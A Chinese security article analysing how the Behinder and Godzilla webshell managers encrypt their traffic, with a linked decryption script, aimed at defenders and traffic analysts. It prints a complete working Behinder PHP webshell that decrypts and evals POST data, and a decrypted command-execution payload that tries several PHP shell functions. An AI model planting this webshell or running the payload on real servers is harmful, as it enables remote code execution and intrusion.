流量加密怎么办?主流webshell管理工具流量解密分析【附解密脚本】

admin 2022年7月20日18:51:53安全工具评论9 views12483字阅读41分36秒阅读模式
流量加密怎么办?主流webshell管理工具流量解密分析【附解密脚本】

一、引言

流量加密怎么办?主流webshell管理工具流量解密分析【附解密脚本】

某行动在即,本文基于冰蝎Behinder_v3.0.11和哥斯拉v4.00-godzilla,对它们的加解密方式进行识别和分析【附简易解密脚本】,希望能在行动中助大家一臂之力。

流量加密怎么办?主流webshell管理工具流量解密分析【附解密脚本】

二、冰蝎

流量加密怎么办?主流webshell管理工具流量解密分析【附解密脚本】
冰蝎加密机制,通过阅读代码可知分为四类,即jsp,php,aspx,asp。
流量加密怎么办?主流webshell管理工具流量解密分析【附解密脚本】

2.1 PHP

阅读php木马脚本:
<?php@error_reporting(0);session_start();    $key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond  $_SESSION['k']=$key;  session_write_close();  $post=file_get_contents("php://input");  if(!extension_loaded('openssl'))  {    $t="base64_"."decode";    $post=$t($post."");        for($i=0;$i<strlen($post);$i++) {           $post[$i] = $post[$i]^$key[$i+1&15];           }            echo "no openssl";  }  else  {    $post=openssl_decrypt($post, "AES128", $key);  }  // echo $post;  // echo "------------------";    $arr=explode('|',$post);    // echo $arr[1];    // echo "------------------";    $func=$arr[0];    $params=$arr[1];  class C{public function __invoke($p) {eval($p."");}}    @call_user_func(new C(),$params);?>

阅读代码可知,在有openssl的情况下冰蝎会使用openssl进行aes128解密,在没有的情况下使用异或解密。

以一次cmd执行为例进行分析为例:

流量加密怎么办?主流webshell管理工具流量解密分析【附解密脚本】
抓取请求进行AES128解密,得到如下代码,与冰蝎源码中的php payload互相对应:
@error_reporting(0);
function getSafeStr($str){    $s1 = iconv('utf-8','gbk//IGNORE',$str);    $s0 = iconv('gbk','utf-8//IGNORE',$s1);    if($s0 == $str){        return $s0;    }else{        return iconv('gbk','utf-8//IGNORE',$str);    }}function main($cmd,$path){    @set_time_limit(0);    @ignore_user_abort(1);    @ini_set('max_execution_time', 0);    $result = array();    $PadtJn = @ini_get('disable_functions');    if (! empty($PadtJn)) {        $PadtJn = preg_replace('/[, ]+/', ',', $PadtJn);        $PadtJn = explode(',', $PadtJn);        $PadtJn = array_map('trim', $PadtJn);    } else {        $PadtJn = array();    }    $c = $cmd;    if (FALSE !== strpos(strtolower(PHP_OS), 'win')) {        $c = $c . " 2>&1n";    }    $JueQDBH = 'is_callable';    $Bvce = 'in_array';    if ($JueQDBH('system') and ! $Bvce('system', $PadtJn)) {        ob_start();        system($c);        $kWJW = ob_get_contents();        ob_end_clean();    } else if ($JueQDBH('proc_open') and ! $Bvce('proc_open', $PadtJn)) {        $handle = proc_open($c, array(            array(                'pipe',                'r'            ),            array(                'pipe',                'w'            ),            array(                'pipe',                'w'            )        ), $pipes);        $kWJW = NULL;        while (! feof($pipes[1])) {            $kWJW .= fread($pipes[1], 1024);        }        @proc_close($handle);    } else if ($JueQDBH('passthru') and ! $Bvce('passthru', $PadtJn)) {        ob_start();        passthru($c);        $kWJW = ob_get_contents();        ob_end_clean();    } else if ($JueQDBH('shell_exec') and ! $Bvce('shell_exec', $PadtJn)) {        $kWJW = shell_exec($c);    } else if ($JueQDBH('exec') and ! $Bvce('exec', $PadtJn)) {        $kWJW = array();        exec($c, $kWJW);        $kWJW = join(chr(10), $kWJW) . chr(10);    } else if ($JueQDBH('exec') and ! $Bvce('popen', $PadtJn)) {        $fp = popen($c, 'r');        $kWJW = NULL;        if (is_resource($fp)) {            while (! feof($fp)) {                $kWJW .= fread($fp, 1024);            }        }        @pclose($fp);    } else {        $kWJW = 0;        $result["status"] = base64_encode("fail");        $result["msg"] = base64_encode("none of proc_open/passthru/shell_exec/exec/exec is available");        $key = $_SESSION['k'];        echo encrypt(json_encode($result), $key);        return;            }    $result["status"] = base64_encode("success");    $result["msg"] = base64_encode(getSafeStr($kWJW));    echo encrypt(json_encode($result),  $_SESSION['k']);}
function encrypt($data,$key){  if(!extension_loaded('openssl'))      {        for($i=0;$i<strlen($data);$i++) {           $data[$i] = $data[$i]^$key[$i+1&15];           }      return $data;      }    else      {        return openssl_encrypt($data, "AES128", $key);      }}$cmd="Y2QgL2QgIkU6XHBocHN0dWR5X3Byb1xXV1dcIiZkaXI=";$cmd=base64_decode($cmd);$path="RTovcGhwc3R1ZHlfcHJvL1dXVy8=";$path=base64_decode($path);main($cmd,$path);
其中cmd参数即为所传输命令的base64编码,并且可以得出响应体的加密与请求所用方式一致。
对响应体解密,可以得到如下信息:
流量加密怎么办?主流webshell管理工具流量解密分析【附解密脚本】
其中,status与msg均为base64编码,解开即可得到明文。
其他操作类型同理,均可解密为明文。

2.2 ASP

由冰蝎代码可知asp使用xor加密
public static byte[] EncryptForAsp(byte[] bs, String key) throws Exception {         for(int i = 0; i < bs.length; ++i) {             bs[i] ^= key.getBytes()[i + 1 & 15];         }          return bs;     }
结合asp脚本,分析的出asp请求和响应使用xor加密可以解析;
响应格式与php相同,status与msg均为base64编码,解开即可得到明文。
流量加密怎么办?主流webshell管理工具流量解密分析【附解密脚本】

2.3 CSharp

通过阅读源码可知,aspx使用的AES/CBC/PKCS5Padding,iv为key。
public static byte[] EncryptForCSharp(byte[] bs, String key) throws Exception {         byte[] raw = key.getBytes("utf-8");         IvParameterSpec iv = new IvParameterSpec(raw);         SecretKeySpec skeySpec = new SecretKeySpec(raw, "AES");         Cipher cipher = Cipher.getInstance("AES/CBC/PKCS5Padding");         cipher.init(1, skeySpec, iv);         byte[] encrypted = cipher.doFinal(bs);         return encrypted;     }
由于aspx的payload为dll文件,请求解密后为pe文件格式,可将文件转存后用ida进行分析。
响应解密出来同样是一个json:
流量加密怎么办?主流webshell管理工具流量解密分析【附解密脚本】
对应信息也需要base64解码为明文。

2.4 java

冰蝎对jsp,jspx系列的处理是一致的。阅读源码可知,使用的是AES/ECB/PKCS5Padding.

public static byte[] DecryptForJava(byte[] bs, String key) throws Exception {         byte[] raw = key.getBytes("utf-8");         SecretKeySpec skeySpec = new SecretKeySpec(raw, "AES");         Cipher cipher = Cipher.getInstance("AES/ECB/PKCS5Padding");         cipher.init(2, skeySpec);         byte[] decrypted = cipher.doFinal(bs);         return decrypted;     }
由于传输的文件为java的class文件,请求解密后为class文件格式,可将文件转存后用idea进行分析。
响应解密出来同样是json,对应信息也需要base64节码为明文。
流量加密怎么办?主流webshell管理工具流量解密分析【附解密脚本】
流量加密怎么办?主流webshell管理工具流量解密分析【附解密脚本】

三、哥斯拉

流量加密怎么办?主流webshell管理工具流量解密分析【附解密脚本】

相比于冰蝎,哥斯拉可选的加密方式就有很多种了,每一种都对应着一个server脚本。

流量加密怎么办?主流webshell管理工具流量解密分析【附解密脚本】
且除了xor的加密方式,响应都会经过findstr函数,首尾各去掉的16位
流量加密怎么办?主流webshell管理工具流量解密分析【附解密脚本】
流量加密怎么办?主流webshell管理工具流量解密分析【附解密脚本】

3.1 phpXor

3.1.1 PhpEvalXor

分析代码及流量,请求为明文可执行代码+加密数据,响应为去掉首尾后,先解base64然后解xor。
关键代码如下:
public byte[] decode(byte[] data) {    if (data != null && data.length > 0) {        try {            return this.D(this.findStr(data));        } catch (Exception var3) {            Log.error(var3);            return null;        }    } else {        return data;    }}public byte[] D(String data) {    byte[] cs = functions.base64Decode(data);    int len = cs.length;
    for(int i = 0; i < len; ++i) {        cs[i] ^= this.key[i + 1 & 15];    }
    return cs;}

3.1.2 PhpXor

分析代码及流量,请求位xor+base64,响应为去掉首尾后,xor+base64

关键代码如下:

public byte[] encode(byte[] data) {    try {        return this.E(data);    } catch (Exception var3) {        Log.error(var3);        return null;    }}
public byte[] decode(byte[] data) {    if (data != null && data.length > 0) {        try {            return this.D(this.findStr(data));        } catch (Exception var3) {            Log.error(var3);            return null;        }    } else {        return data;    }}
public byte[] E(byte[] cs) {    int len = cs.length;
    for(int i = 0; i < len; ++i) {        cs[i] ^= this.key[i + 1 & 15];    }
    return (this.pass + "=" + URLEncoder.encode(functions.base64EncodeToString(cs))).getBytes();}
public byte[] D(String data) {    byte[] cs = functions.base64Decode(data);    int len = cs.length;
    for(int i = 0; i < len; ++i) {        cs[i] ^= this.key[i + 1 & 15];    }
    return cs;}

3.1.3 PhpXorRaw

分析代码及流量,请求为xor,响应为xor
关键代码如下:
public byte[] encode(byte[] data) {    try {        return this.E(data);    } catch (Exception var3) {        Log.error(var3);        return null;    }}
public byte[] decode(byte[] data) {    if (data != null && data.length > 0) {        try {            return this.D(data);        } catch (Exception var3) {            Log.error(var3);            return null;        }    } else {        return data;    }}
public byte[] E(byte[] cs) {    int len = cs.length;
    for(int i = 0; i < len; ++i) {        cs[i] ^= this.key[i + 1 & 15];    }
    return cs;}
public byte[] D(byte[] cs) {    int len = cs.length;
    for(int i = 0; i < len; ++i) {        cs[i] ^= this.key[i + 1 & 15];    }
    return cs;}

3.2 JavaAes

3.2.1 JavaAesBase64

请求响应均为为aes+base64,key就是参数key,模式为ECB
关键代码如下:
this.encodeCipher = Cipher.getInstance("AES");this.decodeCipher = Cipher.getInstance("AES");this.encodeCipher.init(1, new SecretKeySpec(this.key.getBytes(), "AES"));this.decodeCipher.init(2, new SecretKeySpec(this.key.getBytes(), "AES"));

public byte[] encode(byte[] data) {    try {        return (this.pass + "=" + URLEncoder.encode(functions.base64EncodeToString(this.encodeCipher.doFinal(data)))).getBytes();    } catch (Exception var3) {        Log.error(var3);        return null;    }}
public byte[] decode(byte[] data) {    try {        data = functions.base64Decode(this.findStr(data));        return this.decodeCipher.doFinal(data);    } catch (Exception var3) {        Log.error(var3);        return null;    }}

3.2.2 JavaAesRaw

请求响应均为为aes,key就是参数key,模式为ECB
关键代码如下:
this.encodeCipher = Cipher.getInstance("AES");this.decodeCipher = Cipher.getInstance("AES");this.encodeCipher.init(1, new SecretKeySpec(this.key.getBytes(), "AES"));this.decodeCipher.init(2, new SecretKeySpec(this.key.getBytes(), "AES"));public byte[] encode(byte[] data) {    try {        return this.encodeCipher.doFinal(data);    } catch (Exception var3) {        Log.error(var3);        return null;    }}
public byte[] decode(byte[] data) {    try {        return this.decodeCipher.doFinal(data);    } catch (Exception var3) {        Log.error(var3);        return null;    }}

3.3 CShapAes

3.3.1 CShapAesBase64

请求响应均为为aes+base64,key就是参数key,iv也是参数key,模式为CBC
关键代码如下
this.encodeCipher = Cipher.getInstance("AES/CBC/PKCS5Padding");this.decodeCipher = Cipher.getInstance("AES/CBC/PKCS5Padding");this.encodeCipher.init(1, new SecretKeySpec(this.key.getBytes(), "AES"), new IvParameterSpec(this.key.getBytes()));this.decodeCipher.init(2, new SecretKeySpec(this.key.getBytes(), "AES"), new IvParameterSpec(this.key.getBytes()));
public byte[] encode(byte[] data) {        try {            return (this.pass + "=" + URLEncoder.encode(functions.base64Encode(this.encodeCipher.doFinal(data)))).getBytes();        } catch (Exception var3) {            Log.error(var3);            return null;        }    }
public byte[] decode(byte[] data) {    try {        data = functions.base64Decode(this.findStr(data));        return this.decodeCipher.doFinal(data);    } catch (Exception var3) {        Log.error(var3);        return null;    }}

3.3.2 CShapAesRaw

请求响应均为为aes,key就是参数key,iv也是参数key,模式为CBC
关键代码如下:
this.encodeCipher = Cipher.getInstance("AES/CBC/PKCS5Padding");this.decodeCipher = Cipher.getInstance("AES/CBC/PKCS5Padding");this.encodeCipher.init(1, new SecretKeySpec(this.key.getBytes(), "AES"), new IvParameterSpec(this.key.getBytes()));this.decodeCipher.init(2, new SecretKeySpec(this.key.getBytes(), "AES"), new IvParameterSpec(this.key.getBytes()));
public byte[] encode(byte[] data) {    try {        return this.encodeCipher.doFinal(data);    } catch (Exception var3) {        Log.error(var3);        return null;    }}
public byte[] decode(byte[] data) {    try {        return this.decodeCipher.doFinal(data);    } catch (Exception var3) {        Log.error(var3);        return null;    }}

3.3.3 CSharpEvalAesBase64

请求为明文可执行代码+加密数据,请求响应为aes,key就是参数key,iv也是参数key,模式为CBC
关键代码如下
this.encodeCipher = Cipher.getInstance("AES/CBC/PKCS5Padding");this.decodeCipher = Cipher.getInstance("AES/CBC/PKCS5Padding");this.encodeCipher.init(1, new SecretKeySpec(this.key.getBytes(), "AES"), new IvParameterSpec(this.key.getBytes()));this.decodeCipher.init(2, new SecretKeySpec(this.key.getBytes(), "AES"), new IvParameterSpec(this.key.getBytes()));

public byte[] encode(byte[] data) {    try {        return (String.format("%s=%s&", this.pass, this.evalContent) + this.shell.getSecretKey() + "=" + URLEncoder.encode(functions.base64Encode(this.encodeCipher.doFinal(data)))).getBytes();    } catch (Exception var3) {        Log.error(var3);        return null;    }}
public byte[] decode(byte[] data) {    try {        data = functions.base64Decode(this.findStr(data));        return this.decodeCipher.doFinal(data);    } catch (Exception var3) {        Log.error(var3);        return null;    }}

3.3.4 CShapAsmxAesBase64

asmx加密方式与CShapAesBase64一致,只是传参变成xml格式
流量加密怎么办?主流webshell管理工具流量解密分析【附解密脚本】

3.4 aspXor

asp系列的有一个改变就是非raw的首位16位填充变为了6位
流量加密怎么办?主流webshell管理工具流量解密分析【附解密脚本】

3.4.1 AspRaw

抓包可以看到通信是明文的不需要解密
流量加密怎么办?主流webshell管理工具流量解密分析【附解密脚本】
  public byte[] encode(byte[] data) {        try {            return data;        } catch (Exception var3) {            Log.error(var3);            return null;        }    }
   public byte[] decode(byte[] data) {        if (data != null && data.length > 0) {            try {                return data;            } catch (Exception var3) {                Log.error(var3);                return null;            }        } else {            return data;        }    }

3.4.2 AspBase64

加密方式为base64,响应首尾填充6位

流量加密怎么办?主流webshell管理工具流量解密分析【附解密脚本】
public byte[] encode(byte[] data) {        try {            return this.E(data);        } catch (Exception var3) {            Log.error(var3);            return null;        }    }
   public byte[] decode(byte[] data) {        if (data != null && data.length > 0) {            try {                return this.D(this.findStr(data));            } catch (Exception var3) {                Log.error(var3);                return null;            }        } else {            return data;        }    }            public byte[] E(byte[] cs) {        return (this.pass + "=" + URLEncoder.encode(functions.base64EncodeToString(cs))).getBytes();    }
   public byte[] D(String data) {        byte[] cs = functions.base64Decode(data);        return cs;    }

3.4.3 AspEvalBase64

请求为明文转送一部分代码,并将执行数据作为代码中一个变量传输,响应为base64首尾填充6位

public byte[] E(byte[] cs) {        return (this.pass + "=" + this.chopperRequest + "&" + this.shell.getSecretKey() + "=" + URLEncoder.encode(functions.base64EncodeToString(cs))).getBytes();    }
    public byte[] D(String data) {        byte[] cs = functions.base64Decode(data);        return cs;    }

3.4.4 AspXorBae64

加密方式为base64+xor

响应首尾填充6位

public byte[] encode(byte[] data) {        try {            return this.E(data);        } catch (Exception var3) {            Log.error(var3);            return null;        }    }
    public byte[] decode(byte[] data) {        if (data != null && data.length > 0) {            try {                return this.D(this.findStr(data));            } catch (Exception var3) {                Log.error(var3);                return null;            }        } else {            return data;        }    }

    protected void decryption(byte[] data, byte[] key) {        int len = data.length;        int keyLen = key.length;        int index = false;
        for(int i = 1; i <= len; ++i) {            int index = i - 1;            data[index] ^= key[i % keyLen];        }
    }
    public byte[] E(byte[] cs) {        this.decryption(cs, this.key);        return (this.pass + "=" + URLEncoder.encode(functions.base64EncodeToString(cs))).getBytes();    }
    public byte[] D(String data) {        byte[] cs = functions.base64Decode(data);        this.decryption(cs, this.key);        return cs;    }

3.4.5 AspXorRaw

加密方式为xor
其中,super.decryption即为xor函数
public byte[] encode(byte[] data) {         try {             super.decryption(data, this.key);             return data;         } catch (Exception var3) {             Log.error(var3);             return null;         }     }      public byte[] decode(byte[] data) {         if (data != null && data.length > 0) {             try {                 super.decryption(data, this.key);                 return data;             } catch (Exception var3) {                 Log.error(var3);                 return null;             }         } else {             return data;         }     }
流量加密怎么办?主流webshell管理工具流量解密分析【附解密脚本】

四、解密脚本

流量加密怎么办?主流webshell管理工具流量解密分析【附解密脚本】
获取解密脚本链接
https://github.com/webraybtl/webshell_detect
使用方法:
按照加密类型、key和pass,初始化类。然后输入字节流形式的请求/响应体,调用相应的加/解密函数即可。
如下例子:
```pythondecrypter = PHP_XOR_BASE64(pass_='pass', key='3c6e0b8a9c15224a')data = decrypter.decrypt_req_payload(b'pass=DlMRWA1cL1gOVDc2MjRhRwZFEQ==')print(data)data = decrypter.decrypt_res_payload(b'72a9c691ccdaab98fL1tMGI4YTljO/79NDQm7r9PZzBiOA==b4c4e1f6ddd2a488')print(data)```

原文始发于微信公众号(Beacon Tower Lab):流量加密怎么办?主流webshell管理工具流量解密分析【附解密脚本】

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年7月20日18:51:53
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  流量加密怎么办?主流webshell管理工具流量解密分析【附解密脚本】 http://cn-sec.com/archives/1184343.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: